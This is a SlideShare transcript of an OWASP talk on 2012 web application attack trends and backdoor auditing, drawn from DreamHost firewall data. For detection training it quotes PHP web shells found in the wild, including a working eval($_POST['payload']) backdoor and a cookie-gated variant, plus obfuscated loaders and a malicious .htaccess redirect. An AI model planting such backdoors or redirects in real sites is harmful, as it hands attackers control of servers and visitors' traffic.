Download as ODP, PPTX
![OWASP
Example .htaccess infection:
ErrorDocument 404 http://congatarcxisi.ru/
RewriteCond %{HTTP_REFERER} ^.*(google|yahoo|...
RewriteRule ^(.*)$ http://congatarcxisi.ru/ [R=301,L]](https://image.slidesharecdn.com/owasp-130629015319-phpapp02/85/State-of-Web-App-Security-2012-22-320.jpg)
![OWASP
Digging in with timestamps.
$ ls -la omgfire.com/backdoor.php
-rw-rw-r-- 1 user grp 0 Feb 13 21:52 omgfire.com/backdoor.php
$ grep 21:52: logs/omgfire.com/access.log.2012-02-13
123.125.71.31 - - [13/Feb/2012:21:52:53 -0800]
"POST /wp-content/plugins/hello.php HTTP/1.1" 200 158 "-" "Mozilla"](https://image.slidesharecdn.com/owasp-130629015319-phpapp02/85/State-of-Web-App-Security-2012-34-320.jpg)
![OWASP
Dead Simple
<?php
eval($_POST['payload']);
?>](https://image.slidesharecdn.com/owasp-130629015319-phpapp02/85/State-of-Web-App-Security-2012-39-320.jpg)
![OWASP
Some Authentication
if(md5($_COOKIE['be80d91eb9db4ffa'])
== "e8fa67e99b7e07e9e699f8c3d1dbb43d" )
{
eval($_POST['payload']);
exit;
}](https://image.slidesharecdn.com/owasp-130629015319-phpapp02/85/State-of-Web-App-Security-2012-40-320.jpg)
![OWASP
Well Documented
#####cfg#####
# use password true / false #
$create_password = true;
$password = "mugus"; // default password
# UNIX COMMANDS
# description (nst) command
# example: Shutdown (nst) shutdown -h now
######ver####
$ver= "v2.1";
#############
$pass=$_POST['pass'];
if($pass==$password){ ...](https://image.slidesharecdn.com/owasp-130629015319-phpapp02/85/State-of-Web-App-Security-2012-41-320.jpg)
![OWASP
Uhm what...
$FR='sFwFLOzO'|~OU;
$cYqFBi=r7bSCQ&'J|Ok@V';
$z3X0fdta1Nz="c>_"&'Q7[';
$kg6i=#qfapJag'.']/=nX/'^'8'.KyK6.'{';
$iZBTF=lsrc.'<'.Smef&srzI.':'.VmqH;](https://image.slidesharecdn.com/owasp-130629015319-phpapp02/85/State-of-Web-App-Security-2012-50-320.jpg)
![OWASP
Itty Bitty Bitwise Operators
$FR='sFwFLOzO'|~OU;
$cYqFBi=r7bSCQ&'J|Ok@V';
$z3X0fdta1Nz="c>_"&'Q7[';
$kg6i=#qfapJag'.']/=nX/'^'8'.KyK6.'{';
$iZBTF=lsrc.'<'.Smef&srzI.':'.VmqH;](https://image.slidesharecdn.com/owasp-130629015319-phpapp02/85/State-of-Web-App-Security-2012-51-320.jpg)
Uploaded byRobert Rowley
State of Web App Security 2012
This document summarizes trends in web application attacks from August 2011 to March 2012 based on data from DreamHost's web application firewall. It finds that most attacks originate from compromised hosting providers and datacenters and are automated. The motivations for attackers are financial gain through installing backdoors and monetizing traffic through techniques like phishing, spam, and traffic theft. It also provides examples of various types of backdoors found on websites and recommendations for auditing systems to detect backdoors through file monitoring and log analysis.
More Related Content
![[Wroclaw #7] Security test automation](https://cdn.slidesharecdn.com/ss_thumbnails/owaspsecuritytestautomation-171206113544-thumbnail.jpg?width=640&height=640&fit=bounds)
![[OWASP-Bulgaria] G. Geshev - Chapter Introductory Lecture](https://cdn.slidesharecdn.com/ss_thumbnails/owasp-bulgara-g-geshev-120701083350-phpapp02-thumbnail.jpg?width=640&height=640&fit=bounds)
![[Wroclaw #7] AWS (in)security - the devil is in the detail](https://cdn.slidesharecdn.com/ss_thumbnails/awsinsecurityowasp1-171206113942-thumbnail.jpg?width=640&height=640&fit=bounds)
Similar to State of Web App Security 2012
![[OWASP-Bulgaria] G. Geshev - Web Application Firewalls from an Attacker's Per...](https://cdn.slidesharecdn.com/ss_thumbnails/ggeshev-owasp-wafs-offensiveorkillingyour0dayforalousyt-shirt-120701082145-phpapp01-thumbnail.jpg?width=640&height=640&fit=bounds)
![Protección web con ESAPI y AppSensor [GuadalajaraCON 2013]](https://cdn.slidesharecdn.com/ss_thumbnails/proteccinwebconesapiyappsensor-130428131932-phpapp01-thumbnail.jpg?width=640&height=640&fit=bounds)
State of Web App Security 2012
- 1. Copyright © TheOWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation OWASP http://www.owasp.org The state of web application security Robert Rowley DreamHost Robert.Rowley@DreamHost.com 2012
- 2. OWASP Break Down Attack Trends AttackerMotivation Auditing Backdoors
- 3. OWASP Trend data sets 26Million records. Time frame: August 2011 – March 2012 Collected via WAF (mod_security)
- 4.
- 5.
- 6. OWASP Life-cycle of anexploit
- 7. OWASP Life-cycle of anexploit
- 8.
- 9. OWASP Source of thistrend... Attacks are automated. Lead time for attack code update. Successful compromise adds a new node. This creates an exponential growth.
- 10. OWASP Attack Response Notify theISP's abuse desk 90(ish) ISPs notified each day Most are non-responsive to the report.
- 11. OWASP Attack sources Home/BusinessISP (20%) Hosting/Datacenter (80%)
- 12. OWASP Find an exploit?Do the right thing. Bounty programs (facebook, google) Responsible disclosure
- 13.
- 14.
- 15. OWASP 0-day to Pay-day Install backdoors Sell access to backdoors on the black market Phishing Spam BlackHat SEO Traffic Theft Install more backdoors
- 16.
- 17.
- 18. OWASP Payday BlackHat SEO Hidden linksinjected on site Redirect visitors
- 19. OWASP Payday Traffic Theft Javascript/Iframe/other Redirect sitetraffic to malicious pages (malware installs)
- 20. OWASP Payday Install Backdoors Why not? Backdooron backdoor action
- 21. OWASP Little more ontraffic theft. Q1 2012 we noticed an influx of these Actions were taken, data was recorded
- 22. OWASP Example .htaccess infection: ErrorDocument404 http://congatarcxisi.ru/ RewriteCond %{HTTP_REFERER} ^.*(google|yahoo|... RewriteRule ^(.*)$ http://congatarcxisi.ru/ [R=301,L]
- 23. OWASP Collection Pulled theremote site from any .htaccess matching the previous example. 1000 unique domains found Compared them against sitecheck.com
- 24. OWASP SiteCheck report Safe( 2%) Low Risk (29%) Malicious (31%) Unknown (38%)
- 25. OWASP TLD .ru(64%) .com(14%) .info ( 8%) .in ( 8%) .org ( 3%) .net ( 2%) other ( 1%)
- 26. OWASP Registrars Reg.ru (50%) Directi (18%) Other (18%) GoDaddy (13%)
- 27. OWASP IP address other(33%) 208.87.35.103 (22%) 94.63.149.246 (10%) 208.73.210.29 ( 9%) 69.43.161.154 ( 5%) 221.132.34.163 ( 5%) 95.211.131.185 ( 4%) 74.117.116.96 ( 4%) 94.63.149.247 ( 2%) 79.137.226.90 ( 2%) 69.165.98.21 ( 2%) 194.28.114.102 ( 2%)
- 28. OWASP A little aboutincident response
- 29. OWASP Auditing Immediate mitigation Put outthe fire Review Long term fixes Correct business policy Secure code and/or configurations Etc...
- 30. OWASP Make your kungfu stronger. Monitoring Vulnerability released, Incident Assessment, Incident Response Evaluation, Update
- 31. OWASP Make your kungfu stronger. Monitoring Vulnerability released, Incident Assessment, Incident Response Evaluation, Update
- 32. OWASP Auditing nitty gritty Filemonitoring (you did this right?) Logs (correlate timestamps) Logs (sort by request!) No logs? Malware detection by hand
- 33. OWASP FileSystem Monitoring Part ofyour backups. Just use rsync Inotify (kernel level) Tripwire (daemon/service) DIY
- 34. OWASP Digging in withtimestamps. $ ls -la omgfire.com/backdoor.php -rw-rw-r-- 1 user grp 0 Feb 13 21:52 omgfire.com/backdoor.php $ grep 21:52: logs/omgfire.com/access.log.2012-02-13 123.125.71.31 - - [13/Feb/2012:21:52:53 -0800] "POST /wp-content/plugins/hello.php HTTP/1.1" 200 158 "-" "Mozilla"
- 35. OWASP Digging in withHTTP logs $ awk '{print $7}' access.log | sort | uniq -c | sort -n
- 36. OWASP $ awk '{print$7}' access.log | sort | uniq -c | sort -n 1 /phpMyAdmin-2.2.3/index.php 1 /phpMyAdmin-2.5.5-pl1/index.php 1 /phpMyAdmin-2.5.5/index.php 1 /phpMyAdmin-2.5.6-rc2/index.php 1 /phpMyAdmin/index.php 1 /pma/index.php 1 /web/phpMyAdmin/index.php 1 /websql/index.php 2 /phpmyadmin/index.php 4 /robots.txt 242 / Digging in with HTTP logs
- 37. OWASP No success? Lets getinto some backdoor auditing These backdoors were found in the wild Show you what to look for Learn more about the attacker's methods
- 38.
- 39.
- 40. OWASP Some Authentication if(md5($_COOKIE['be80d91eb9db4ffa']) == "e8fa67e99b7e07e9e699f8c3d1dbb43d") { eval($_POST['payload']); exit; }
- 41. OWASP Well Documented #####cfg##### # usepassword true / false # $create_password = true; $password = "mugus"; // default password # UNIX COMMANDS # description (nst) command # example: Shutdown (nst) shutdown -h now ######ver#### $ver= "v2.1"; ############# $pass=$_POST['pass']; if($pass==$password){ ...
- 42.
- 43. OWASP Base64 decode eval(base64_decode('JGF1dGhfcGFzcyA9IC... My favoriteway to handle them: sed s/eval/print/g < inputfile > outputfile print(base64_decode('JGF1dGhfcGFzcyA9IC... PHP parser outputs: $auth_pass = "35a93487bc9204c...
- 44. OWASP GZinflate <? error_reporting(0); echo "ok!"; $code ="xZbNYaMwFFP3lfoO7JJHwnXa … “; @eval(gzinflate(base64_decode($code))); ?>
- 45. OWASP Gold star fortrying ... eval(gzinflate(str_rot13(base64_decode('FJ3FjsNc ulJfpXT9WB6YVnfdltmJmW ...
- 46.
- 47. OWASP Regex revenge preg_replace("/.*/e","x65x76x61x6Cx28x67... 65 =e 76 = v 61 = a 6C = l 28 = (
- 48.
- 49.
- 50.
- 51. OWASP Itty Bitty BitwiseOperators $FR='sFwFLOzO'|~OU; $cYqFBi=r7bSCQ&'J|Ok@V'; $z3X0fdta1Nz="c>_"&'Q7['; $kg6i=#qfapJag'.']/=nX/'^'8'.KyK6.'{'; $iZBTF=lsrc.'<'.Smef&srzI.':'.VmqH;
- 52. OWASP Backdoor Conclusions They areevolving Fingerprinting can be untrustworthy You should monitor your filesystem
- 53. OWASP Thank you DreamHost &DreamHost customers Trustwave (mod_security)
- 54. OWASP Further Reading Mikko Hypponen(TED talks) http://blog.spiderlabs.com http://blog.dreamhost.com/category/security Want to follow up? Email: robert.rowley@dreamhost.com
Editor's Notes
- #4 Collected using mod_security across out entire network Let's jump right in!
- #5 Nice average Trending down?
- #6 Broken down between SQLI, file upload, File inclusion, and arbitrary code execution attacks
- #7 Showing an example of “background noise” These attacks have been aroudn 1+ year
- #8 A wild zeroday appears Released beginning of august
- #10 Exponential growth until they're caught/cleaned up.
- #11 Many just forward the complaint to their customer (whomever owns the server assigned the IP address) An unsettling few are unable to address this and request help with it (to which we oblige the best we can) These responses let us know who the attackers are, and it's no surprise!
- #12 It should be no surprise that compromised sites are the leading attack source. Compromised sites are used to attack other sites.
- #13 Be ethical
- #15 I pretty much exclusively see money as the motivating factor. There are exceptions though, quoting Mikko Hypponen, the top three are money, ideology, and espionage So, how do they get money from compromising sites?
- #16 The people taking the first step may not be the same who take the final step.
- #23 Two examples how this was done via .htaccess
- #25 SiteCheck.com's report on the domain being redirected to.
- #26 Breakdown of the TLD used for the domreg.
- #27 Domain name registrar breakdown
- #28 IP addrss the domains resolved to.
- #30 Do not confuse the two, thinking about long term fixes when your site is down is wasting precious time. Thinking that you fixed that “one” hole is good enough is not really a good long term fix.
- #31 Example “flow cycle” Presumes you've addressed all other security concerns (backups, updates, policy, etc..)
- #32 Never stop improving
- #35 Time stamp correlation with file creations, logs, etc... Note the POST request … shady!
- #36 Awk/grep/sort madness!
- #37 Awk/grep/sort madness!
- #52 This eventually breaks down the the old standard “eval(base64_decode...”